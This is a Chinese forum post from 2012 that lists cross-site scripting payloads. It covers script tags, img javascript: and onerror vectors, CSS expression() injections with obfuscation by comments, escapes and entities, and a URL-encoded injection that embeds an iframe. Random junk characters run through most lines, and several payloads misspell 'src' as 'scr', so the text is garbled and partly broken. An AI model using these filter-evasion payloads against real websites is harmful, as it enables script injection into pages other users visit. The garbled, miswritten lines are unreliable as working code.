<script>alert("跨站")</script> (最常用)
: ]6 O7 @2 A& G0 t9 j' \/ T<img scr=javascript:alert("跨站")></img>1 h' L+ g. ?6 a. x) a1 @: H. ~
<img scr="javascript: alert(/跨站/)></img>6 F6 l0 c' L( Q1 g3 U' m7 a
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
! W8 B# O* `: s( q( q<img scr="#" onerror=alert(/跨站/)></img>
# J3 O, ?: }8 _$ f- O4 c) x" _<img scr="#" style="xss:expression(alert(/xss/));"></img>& u. a! b3 F! ~% @. \
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释); M0 ]! Z9 v m
<img src=vbscript:msgbox ("xss")></img>9 S+ s1 l/ f5 o' V4 D! Y& d
<style> input {left:expression (alert('xss'))}</style>7 ^- Z. O( X9 {1 M
<div style={left:expression (alert('xss'))}></div>
- t, B8 u, L j/ U |<div style={left:exp/* */ression (alert('xss'))}></div>
7 z5 d5 r4 k, v4 l+ ^+ ^<div style={left:\0065\0078ression (alert('xss'))}></div>0 a1 h" S# w$ w3 d
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div># P/ a2 J3 c9 F8 U% U' Q$ I
unicode <div style="{left:expRessioN (alert('xss'))}">
$ D, C5 P% G/ J& m- Q! y* b& u) w9 l% P1 K b
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
' n. W+ F& [, B1 M# F5 I. H |
发表于 2012-9-13 17:15:04
收藏
支持
反对